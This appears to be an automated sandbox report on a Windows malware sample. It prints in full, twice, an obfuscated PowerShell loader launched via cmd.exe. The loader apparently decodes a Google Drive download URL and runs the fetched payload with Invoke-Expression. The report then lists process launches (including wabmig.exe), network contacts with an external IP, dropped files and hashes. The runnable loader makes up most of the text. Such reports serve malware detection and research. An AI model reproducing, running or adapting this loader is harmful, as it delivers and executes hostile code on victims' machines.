"C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Octan Svedent Musegraa Metoestrum Bundgrnsers Hukommelsesmaaler #>;$rection='Indkbs';<#blodbrdre resinogenous Antiulcer Lgeerklrings Unessentially Paratyfussen #>;$Rykkeres=$host.PrivateData;If ($Rykkeres) {$Samsender++;}function Annoteredes($Medhrsforstrker){$Bogus=$Medhrsforstrker.Length-$Samsender;for( $Filstrrelserne=5;$Filstrrelserne -lt $Bogus;$Filstrrelserne+=6){$byganging+=$Medhrsforstrker[$Filstrrelserne];}$byganging;}function Isoerucic($Unpossibility){ . ($Fabulous) ($Unpossibility);}$Bayardly=Annoteredes 'AttitM dsknoSti mz Bl.diGluttlHemotlSt,rtaBygge/Ski d5P gta.bolig0Undel D vo( ickWServii oldnFuserdFe tpoFatuowNeighs Wran ,aramNRingeTNeo h Luste1a rod0Primo.straf0 Chor;U fam IrrhaWTroldiFordon F ev6Fi ke4 ubpr;Coaut GiebxApina6Opdag4Risot;Opvas emonr eduivSkrav: Arge1Kogek2 Stje1Redde.Forma0Hyper),nter Ak,ieG G pheGrisecAcro k T.huoSexed/Sal i2Macra0Fo,he1Fiks 0Overl0Irenp1af.rv0tipsf1Front SpillFUdenoiGallarChokreloo,af ,usto ommexVot,r/Pa cr1Queen2Passa1Mi ea.Ritor0Alett ';$Coconucan=Annoteredes 'JacamuSurahsTilskeSo surUndew- romlaJvninGMultiEBack NIndoxTAmbur ';$Pressefold=Annoteredes ' HjtihGuldbtAsbolt Bu.kpCad,nsTilba: Kul / Forl/En modKart r GodtiTa kev Eu yeKari,. WashgCorncoForayoSobergVeg,tlZeoliePrela. Trerc machoTr.lim Omfo/Dematusch.zcMagis?DrunkeR.obbxBrackpOvipoo Engar,anoptRauli=Mike d LittoplkkewA.ayenomr.glAdditoaaregauntendTil e&Sgabei mkkedBloss=Nonel1SubatTMarokRAugmex,hlork Antr5,inguOHel byKwachQPe.toBDekomQLnindHHal fyKor eDmav pIToldpCUdrej7San tKRe reI Gram-OliviSKreisDNome M.fspnbTestpxPilotXUnd lcRadioESkibsfAp.livTelefHKogepBUn,ecp Nigh ';$Arkaiserings=Annoteredes ' inam>,aarr ';$Fabulous=Annoteredes ' SlidIAmusiEThelyxUngra ';$Panatrophy='Dobbeltheder';$Fermaten204 = Annoteredes 'E streStandcFamilh SkrsoH,dro Unsoi% LysbaKnav.p DilapUdsk dReincaledeltSlugwaKr ds%Weath\PolyiRIkendoc,okruKikkegFascieNegromElha oSemblnForortSmagsiGaveatoplsneTermi.Tale,SDatatyTndstnPetro Urkok&Va me&Borte storeCodaecModsvh elloSew d AugustConfi ';Isoerucic (Annoteredes ' Evan$EnstagTempel Ann oDuellbHalvta ,plyl Ing,:CompoNPrereeFas,nlEmendupori mInhumb Checi Teena Chern Meco= ogol(SecobcAnelsm Ov,rd Un m Grint/ AcalcVer i ndis$ Va,pF xletePooltrD ippmAluniaU hart JodleParapnVideo2 Mopa0Slibr4 Heir)Snaf, ');Isoerucic (Annoteredes 'Em ha$,onofgSplitlServio Sapob AarsaUd ntlGluti:VolupDOve siFarinsSj sknDestiePioneyAfsvk= ,rkf$ ,legPBiafrrChiroeWernasAnknysAutoreCicerfPhiloo oodl idrtd la,n.S,vefsSvbtepByggel MouniNosedtOpmar(Wh os$ U.coANikkor SommkSuge a ytteiMiljmsTonn eE nrirPr.ssizorrinTepi gA timsLayne)tr gl ');Isoerucic (Annoteredes 'Rette[ReadlN Geoneoph ht Bark. A seS UncoeSa.torG,nnevSvieriModtacSileneSoupePInordoPfalziFaarenPlutotFirkaMBasilaTekstnTruckaTokregNonaneAll grAfbun]Jurid:Criss:Left.SPhi oeSulphc quaru reparPle eiKanontS dslyD utoP Presrhoodwo xpotFigeno Ke lcKinkloUd,krlsuper recep=Sandj Touna[Yle tNToxiceErerutC,eko.Un.omSPage.e polyc SynauChefprOverei E itt,ropay T lePDaglirA minometritoak,ioBifrocEfteroCastilCoctoT nliylep op,uspieS,est]Unhes:Stump: CresT SuprlDdemasAmpul1O era2Drgma ');$Pressefold=$Disney[0];$Godhed= (Annoteredes ' Roup$Un epG arlel Enogo An,ibPanopa ,ncoL Pyro:MachifFor aOSp,noR tikotObscuISimu,DWeaseS nebrU aptiHRaa,uyUr niR Fod.eUnthwtRetfr=Photon Dob eDampnWSkand- ultiOUnplobServijUn,veE D ukCOverstMu ti hovedsforsmy LittsStormTSwelle PedimBordt. gnvaN SemiEJuniot teat.FordeWTungtEGastrBGloriC oafeLChariITak teUndern Orvit');$Godhed+=$Nelumbian[1];Isoerucic ($Godhed);Isoerucic (Annoteredes 'S jfr$airmoFSy seoContrrAge etUdk aiBygnidBorgesOpva umisashLnsleyAf,elrKvikkeAnnegtEnerg.Rag aHLegleeSvansaFaunadSammeePaahir Demos eldr[Kiel $BilleCVurdeo Haric irtuo Frndn SecruGe omcTrideaUnhern Phys] La h=Gafsg$U fjeBBadlia IrlnyOvercaSter.r ogedHandll Withy Solu ');$Intellectualism=Annoteredes 'Tjene$anno FSikreoDendrrDat stTriviityra d Forts onopu Ha.khSabbayCellurTr,pheNon at Atom.BetinD Blyfo Ka.vw MastnOologlOneiroGyrita itsdSeksdFstraniListel,impaeHucks( Ra i$ ActuP Bo tr Ttnie F.dtsGryphssubs e ReexfNigrioParlalTauchdSigna, Myn $B.ndslStjereRoma,uBureakHu,reeIn ram la yiHyalidLa.gf)Sodom ';$leukemid=$Nelumbian[0];Isoerucic (Annoteredes ' Ba.c$DestiGPote LNaturo EfteBIndpiaTorumLRega :H llofStormoDrainR AnthMParaln F aeIKont NMicrogBonitsPaaviLguldsRSpinkeEductRSemi eCoenaNNosebsdagce= Seni(viburT P imeCivilSI,tertFritn- AtelPU dera artiTBrikkhHuman Pinde$S rubLGe,neEHumoruTurpuKDiscoeAssesMTeltli m.crd Fire)T.ldb ');while (!$Formningslrerens) {Isoerucic (Annoteredes ' urer$PhotogAn nylCuckooStngebFedtkaValerl ryob:ForsgP LskbhSceptaBromis Al.hcSuperuMix im lvpa= Pyro$Lamint Wes.r Sme,uS moneSkyld ') ;Isoerucic $Intellectualism;Isoerucic (Annoteredes 'H ndeSSouthtMil iaT aumrArb jt Kilo-CoronS.dbrylImpereStageeConcepOver Aph o4Ansla ');Isoerucic (Annoteredes ' ari$Ra esgT esplBokosoS raabUpstea Gr vlAmmon: UlykFPro.ooDetalrKittymFiscan intji Kantn SuccgLr insAabnilIrrevrChi,oe TillrDisc e Moton Ser.ssk.iv=Quoit( PranTPhysiePrimrsCompatHexad-syllaP Spr aPleoptslipch Didr Union$Runoll MateeameriuA,plikCasefeHanbum,laceiOpfeddSalut).roni ') ;Isoerucic (Annoteredes 'Unwon$KvindgU,clelweb eo KimbbInorgaProfelSk ve:AarsoOKulturKon ayK.kkezBadeloViandpTyngesDigiti andspseud= Rgfa$ ugegOssiclSamp oSog.ibF igiau gdolTrans:PaparJReskoiUnclam RevaiE.stes atio+Gospe+Tr ff%Teneb$ParenD PosiiHovedsUdstan Phy,eKaalhyTandf.Mns ec undeoHulsluBoj,rnCarnitUn er ') ;$Pressefold=$Disney[$Oryzopsis];}$Psychosarcous=285525;$Magdalenian158=28702;Isoerucic (Annoteredes 'G nne$Yanc gsyge lcovino S evbFa,cea Baanlbrats:AummbEUcen,m nittb BecriWoktriSvovld stal H,sbo=Withe anhaGRygereCent.tRecau-AppliCEffecoAn.renSvbeltVer ieSp,cinunr at ecom Dog,a$TrylllPrakseUnintu Flikk S.adeClonim AsiliNveskdStran ');Isoerucic (Annoteredes ' Nonl$vulgagTilhylSabazoNyh,dbBondea aarblSkovf:NoneqALystgdFa eleBi asnAbearo Archs,ithra Defor BldgcFreskoGastrmJ.velaudbedtFlaadaLesse Unin=S,nke Prisg[stemnSSviney TrinsCrinetPr dieGerikmKu he.Sne aCu stioSkyggnGonoev eodoeSka nrP lletMissi] Prna: inst:Stj,rFBaldarDebatoforgrm apitB tartaD,ndrsSauereFolke6Forsa4 iecrSSextut torkrplyw.iTruncnBlinkgPolst(,rumm$ForkrE Sy.pmMaalebpr triLegiti ennedSkema)Resf. ');Isoerucic (Annoteredes 'erken$UnridgNonralKollao StatbResopaEpithl,etri:Def nG Cha r Vul aCochltTupiluRegnilVidneaCr tatHet riUdsatoSoljengastreReliar cinencurtaefrat Kon,o=Knald Urege[EntitS Dec.y ynges D emt ,edae legmmsauce.BarkaTSoppee idspx forstSelve.Un ecE OctonFlokdchekseoYo thdContriTwangn alvhgTairn]clear:Total:lis bA.onsuSPassaCFje,dI U paIReawo.OverfGCoiffeFrostt ,eerSS,ppltEs.ayrBlaaniPostunToldbgAntio(Filmm$J.rdsATitubdbru eeKlumpnForsko Unfos Ep naoutserNonnacSnertoDaarlmUdarbaUngent Pru aSek u)Unp i ');Isoerucic (Annoteredes ' Plas$ MiligO tbulCheckoFudgibMind.aDaubelBgetr:PriorBDis ru rivinBojegdJulemrdatara.astea Nae.dChargdUnplaeOrketnSkalp= bene$EpizoGUnh yrKarrjaRide tKejseuElectlbetydaHandst GnisiDek,aoSocianInvigeF.rcir Doc.n Nidee weat.BeskasFormouU derbAquaesTufsttVelurrJefali egmn GiangTr mm(Autol$Cri.sP.omersMark,yIndhac SavkhDiskooNoncrsDoseraOrangrFremmcSig.bo Phy,uHotelsBagpi,Fired$ChiasM ruiaSnoldgGallodUnsooaFormelFno ueTransnS vefiBrskuaVinklnMakvr1Karol5Henhq8Ungu )Brimm ');Isoerucic $Bundraadden;"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Octan Svedent Musegraa Metoestrum Bundgrnsers Hukommelsesmaaler #>;$rection='Indkbs';<#blodbrdre resinogenous Antiulcer Lgeerklrings Unessentially Paratyfussen #>;$Rykkeres=$host.PrivateData;If ($Rykkeres) {$Samsender++;}function Annoteredes($Medhrsforstrker){$Bogus=$Medhrsforstrker.Length-$Samsender;for( $Filstrrelserne=5;$Filstrrelserne -lt $Bogus;$Filstrrelserne+=6){$byganging+=$Medhrsforstrker[$Filstrrelserne];}$byganging;}function Isoerucic($Unpossibility){ . ($Fabulous) ($Unpossibility);}$Bayardly=Annoteredes 'AttitM dsknoSti mz Bl.diGluttlHemotlSt,rtaBygge/Ski d5P gta.bolig0Undel D vo( ickWServii oldnFuserdFe tpoFatuowNeighs Wran ,aramNRingeTNeo h Luste1a rod0Primo.straf0 Chor;U fam IrrhaWTroldiFordon F ev6Fi ke4 ubpr;Coaut GiebxApina6Opdag4Risot;Opvas emonr eduivSkrav: Arge1Kogek2 Stje1Redde.Forma0Hyper),nter Ak,ieG G pheGrisecAcro k T.huoSexed/Sal i2Macra0Fo,he1Fiks 0Overl0Irenp1af.rv0tipsf1Front SpillFUdenoiGallarChokreloo,af ,usto ommexVot,r/Pa cr1Queen2Passa1Mi ea.Ritor0Alett ';$Coconucan=Annoteredes 'JacamuSurahsTilskeSo surUndew- romlaJvninGMultiEBack NIndoxTAmbur ';$Pressefold=Annoteredes ' HjtihGuldbtAsbolt Bu.kpCad,nsTilba: Kul / Forl/En modKart r GodtiTa kev Eu yeKari,. WashgCorncoForayoSobergVeg,tlZeoliePrela. Trerc machoTr.lim Omfo/Dematusch.zcMagis?DrunkeR.obbxBrackpOvipoo Engar,anoptRauli=Mike d LittoplkkewA.ayenomr.glAdditoaaregauntendTil e&Sgabei mkkedBloss=Nonel1SubatTMarokRAugmex,hlork Antr5,inguOHel byKwachQPe.toBDekomQLnindHHal fyKor eDmav pIToldpCUdrej7San tKRe reI Gram-OliviSKreisDNome M.fspnbTestpxPilotXUnd lcRadioESkibsfAp.livTelefHKogepBUn,ecp Nigh ';$Arkaiserings=Annoteredes ' inam>,aarr ';$Fabulous=Annoteredes ' SlidIAmusiEThelyxUngra ';$Panatrophy='Dobbeltheder';$Fermaten204 = Annoteredes 'E streStandcFamilh SkrsoH,dro Unsoi% LysbaKnav.p DilapUdsk dReincaledeltSlugwaKr ds%Weath\PolyiRIkendoc,okruKikkegFascieNegromElha oSemblnForortSmagsiGaveatoplsneTermi.Tale,SDatatyTndstnPetro Urkok&Va me&Borte storeCodaecModsvh elloSew d AugustConfi ';Isoerucic (Annoteredes ' Evan$EnstagTempel Ann oDuellbHalvta ,plyl Ing,:CompoNPrereeFas,nlEmendupori mInhumb Checi Teena Chern Meco= ogol(SecobcAnelsm Ov,rd Un m Grint/ AcalcVer i ndis$ Va,pF xletePooltrD ippmAluniaU hart JodleParapnVideo2 Mopa0Slibr4 Heir)Snaf, ');Isoerucic (Annoteredes 'Em ha$,onofgSplitlServio Sapob AarsaUd ntlGluti:VolupDOve siFarinsSj sknDestiePioneyAfsvk= ,rkf$ ,legPBiafrrChiroeWernasAnknysAutoreCicerfPhiloo oodl idrtd la,n.S,vefsSvbtepByggel MouniNosedtOpmar(Wh os$ U.coANikkor SommkSuge a ytteiMiljmsTonn eE nrirPr.ssizorrinTepi gA timsLayne)tr gl ');Isoerucic (Annoteredes 'Rette[ReadlN Geoneoph ht Bark. A seS UncoeSa.torG,nnevSvieriModtacSileneSoupePInordoPfalziFaarenPlutotFirkaMBasilaTekstnTruckaTokregNonaneAll grAfbun]Jurid:Criss:Left.SPhi oeSulphc quaru reparPle eiKanontS dslyD utoP Presrhoodwo xpotFigeno Ke lcKinkloUd,krlsuper recep=Sandj Touna[Yle tNToxiceErerutC,eko.Un.omSPage.e polyc SynauChefprOverei E itt,ropay T lePDaglirA minometritoak,ioBifrocEfteroCastilCoctoT nliylep op,uspieS,est]Unhes:Stump: CresT SuprlDdemasAmpul1O era2Drgma ');$Pressefold=$Disney[0];$Godhed= (Annoteredes ' Roup$Un epG arlel Enogo An,ibPanopa ,ncoL Pyro:MachifFor aOSp,noR tikotObscuISimu,DWeaseS nebrU aptiHRaa,uyUr niR Fod.eUnthwtRetfr=Photon Dob eDampnWSkand- ultiOUnplobServijUn,veE D ukCOverstMu ti hovedsforsmy LittsStormTSwelle PedimBordt. gnvaN SemiEJuniot teat.FordeWTungtEGastrBGloriC oafeLChariITak teUndern Orvit');$Godhed+=$Nelumbian[1];Isoerucic ($Godhed);Isoerucic (Annoteredes 'S jfr$airmoFSy seoContrrAge etUdk aiBygnidBorgesOpva umisashLnsleyAf,elrKvikkeAnnegtEnerg.Rag aHLegleeSvansaFaunadSammeePaahir Demos eldr[Kiel $BilleCVurdeo Haric irtuo Frndn SecruGe omcTrideaUnhern Phys] La h=Gafsg$U fjeBBadlia IrlnyOvercaSter.r ogedHandll Withy Solu ');$Intellectualism=Annoteredes 'Tjene$anno FSikreoDendrrDat stTriviityra d Forts onopu Ha.khSabbayCellurTr,pheNon at Atom.BetinD Blyfo Ka.vw MastnOologlOneiroGyrita itsdSeksdFstraniListel,impaeHucks( Ra i$ ActuP Bo tr Ttnie F.dtsGryphssubs e ReexfNigrioParlalTauchdSigna, Myn $B.ndslStjereRoma,uBureakHu,reeIn ram la yiHyalidLa.gf)Sodom ';$leukemid=$Nelumbian[0];Isoerucic (Annoteredes ' Ba.c$DestiGPote LNaturo EfteBIndpiaTorumLRega :H llofStormoDrainR AnthMParaln F aeIKont NMicrogBonitsPaaviLguldsRSpinkeEductRSemi eCoenaNNosebsdagce= Seni(viburT P imeCivilSI,tertFritn- AtelPU dera artiTBrikkhHuman Pinde$S rubLGe,neEHumoruTurpuKDiscoeAssesMTeltli m.crd Fire)T.ldb ');while (!$Formningslrerens) {Isoerucic (Annoteredes ' urer$PhotogAn nylCuckooStngebFedtkaValerl ryob:ForsgP LskbhSceptaBromis Al.hcSuperuMix im lvpa= Pyro$Lamint Wes.r Sme,uS moneSkyld ') ;Isoerucic $Intellectualism;Isoerucic (Annoteredes 'H ndeSSouthtMil iaT aumrArb jt Kilo-CoronS.dbrylImpereStageeConcepOver Aph o4Ansla ');Isoerucic (Annoteredes ' ari$Ra esgT esplBokosoS raabUpstea Gr vlAmmon: UlykFPro.ooDetalrKittymFiscan intji Kantn SuccgLr insAabnilIrrevrChi,oe TillrDisc e Moton Ser.ssk.iv=Quoit( PranTPhysiePrimrsCompatHexad-syllaP Spr aPleoptslipch Didr Union$Runoll MateeameriuA,plikCasefeHanbum,laceiOpfeddSalut).roni ') ;Isoerucic (Annoteredes 'Unwon$KvindgU,clelweb eo KimbbInorgaProfelSk ve:AarsoOKulturKon ayK.kkezBadeloViandpTyngesDigiti andspseud= Rgfa$ ugegOssiclSamp oSog.ibF igiau gdolTrans:PaparJReskoiUnclam RevaiE.stes atio+Gospe+Tr ff%Teneb$ParenD PosiiHovedsUdstan Phy,eKaalhyTandf.Mns ec undeoHulsluBoj,rnCarnitUn er ') ;$Pressefold=$Disney[$Oryzopsis];}$Psychosarcous=285525;$Magdalenian158=28702;Isoerucic (Annoteredes 'G nne$Yanc gsyge lcovino S evbFa,cea Baanlbrats:AummbEUcen,m nittb BecriWoktriSvovld stal H,sbo=Withe anhaGRygereCent.tRecau-AppliCEffecoAn.renSvbeltVer ieSp,cinunr at ecom Dog,a$TrylllPrakseUnintu Flikk S.adeClonim AsiliNveskdStran ');Isoerucic (Annoteredes ' Nonl$vulgagTilhylSabazoNyh,dbBondea aarblSkovf:NoneqALystgdFa eleBi asnAbearo Archs,ithra Defor BldgcFreskoGastrmJ.velaudbedtFlaadaLesse Unin=S,nke Prisg[stemnSSviney TrinsCrinetPr dieGerikmKu he.Sne aCu stioSkyggnGonoev eodoeSka nrP lletMissi] Prna: inst:Stj,rFBaldarDebatoforgrm apitB tartaD,ndrsSauereFolke6Forsa4 iecrSSextut torkrplyw.iTruncnBlinkgPolst(,rumm$ForkrE Sy.pmMaalebpr triLegiti ennedSkema)Resf. ');Isoerucic (Annoteredes 'erken$UnridgNonralKollao StatbResopaEpithl,etri:Def nG Cha r Vul aCochltTupiluRegnilVidneaCr tatHet riUdsatoSoljengastreReliar cinencurtaefrat Kon,o=Knald Urege[EntitS Dec.y ynges D emt ,edae legmmsauce.BarkaTSoppee idspx forstSelve.Un ecE OctonFlokdchekseoYo thdContriTwangn alvhgTairn]clear:Total:lis bA.onsuSPassaCFje,dI U paIReawo.OverfGCoiffeFrostt ,eerSS,ppltEs.ayrBlaaniPostunToldbgAntio(Filmm$J.rdsATitubdbru eeKlumpnForsko Unfos Ep naoutserNonnacSnertoDaarlmUdarbaUngent Pru aSek u)Unp i ');Isoerucic (Annoteredes ' Plas$ MiligO tbulCheckoFudgibMind.aDaubelBgetr:PriorBDis ru rivinBojegdJulemrdatara.astea Nae.dChargdUnplaeOrketnSkalp= bene$EpizoGUnh yrKarrjaRide tKejseuElectlbetydaHandst GnisiDek,aoSocianInvigeF.rcir Doc.n Nidee weat.BeskasFormouU derbAquaesTufsttVelurrJefali egmn GiangTr mm(Autol$Cri.sP.omersMark,yIndhac SavkhDiskooNoncrsDoseraOrangrFremmcSig.bo Phy,uHotelsBagpi,Fired$ChiasM ruiaSnoldgGallodUnsooaFormelFno ueTransnS vefiBrskuaVinklnMakvr1Karol5Henhq8Ungu )Brimm ');Isoerucic $Bundraadden;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Rougemontite.Syn && echo t"

C:\Program Files (x86)\windows mail\wabmig.exe

"C:\Program Files (x86)\windows mail\wabmig.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.179.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.187.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 225.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
GB 142.250.179.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.187.227:80 o.pki.goog tcp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
GB 142.250.187.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 137.184.191.215:80 137.184.191.215 tcp
US 8.8.8.8:53 215.191.184.137.in-addr.arpa udp
US 137.184.191.215:80 137.184.191.215 tcp
US 137.184.191.215:80 137.184.191.215 tcp
US 8.8.8.8:53 233.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 203.142.123.92.in-addr.arpa udp
US 137.184.191.215:80 137.184.191.215 tcp

Files

memory/4968-0-0x00007FF8D4B53000-0x00007FF8D4B55000-memory.dmp

memory/4968-1-0x0000024475B00000-0x0000024475B22000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ikteime5.w4o.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4968-11-0x00007FF8D4B50000-0x00007FF8D5611000-memory.dmp

memory/4968-12-0x00007FF8D4B50000-0x00007FF8D5611000-memory.dmp

memory/4968-14-0x00007FF8D4B53000-0x00007FF8D4B55000-memory.dmp

memory/4968-15-0x00007FF8D4B50000-0x00007FF8D5611000-memory.dmp

memory/4968-17-0x00007FF8D4B50000-0x00007FF8D5611000-memory.dmp

memory/4188-18-0x0000000002250000-0x0000000002286000-memory.dmp

memory/4188-19-0x0000000004D10000-0x0000000005338000-memory.dmp

memory/4188-20-0x0000000004BC0000-0x0000000004BE2000-memory.dmp

memory/4188-22-0x0000000005430000-0x0000000005496000-memory.dmp

memory/4188-21-0x0000000004C60000-0x0000000004CC6000-memory.dmp

memory/4188-32-0x00000000054A0000-0x00000000057F4000-memory.dmp

memory/4968-33-0x00007FF8D4B50000-0x00007FF8D5611000-memory.dmp

memory/4188-34-0x0000000005A70000-0x0000000005A8E000-memory.dmp

memory/4188-35-0x0000000006010000-0x000000000605C000-memory.dmp

memory/4188-36-0x0000000007410000-0x0000000007A8A000-memory.dmp

memory/4188-37-0x0000000005FB0000-0x0000000005FCA000-memory.dmp

memory/4188-38-0x0000000006E30000-0x0000000006EC6000-memory.dmp

memory/4188-39-0x00000000060D0000-0x00000000060F2000-memory.dmp

memory/4188-40-0x0000000008040000-0x00000000085E4000-memory.dmp

C:\Users\Admin\AppData\Roaming\Rougemontite.Syn

MD5 7df7a44a36f0666d01596fdfb4e93c5c
SHA1 c465aa950ffbfefe481851e0715d3b144585667e
SHA256 2ad4cb2a56b1f5150c2806ccb0f2527c61f6d2946751cad910a33e60313862b5
SHA512 7756fae223ac9ba367ef85efc829c5b734076202530f9492ee723f6c1b31387d922b166d1596a77c80b2472a352691f0b109999b48d9ffea0a90f888c7077e26

memory/4188-42-0x00000000085F0000-0x000000000C3A6000-memory.dmp

memory/4968-43-0x00007FF8D4B50000-0x00007FF8D5611000-memory.dmp

memory/2480-44-0x0000000001030000-0x0000000004DE6000-memory.dmp

memory/2480-58-0x0000000001030000-0x0000000004DE6000-memory.dmp

memory/4968-61-0x00007FF8D4B50000-0x00007FF8D5611000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2392887640-1187051047-2909758433-1000\0f5007522459c86e95ffcc62f32308f1_c186ecc3-67e4-4d2b-8682-b6c322da87aa

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2392887640-1187051047-2909758433-1000\0f5007522459c86e95ffcc62f32308f1_c186ecc3-67e4-4d2b-8682-b6c322da87aa

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b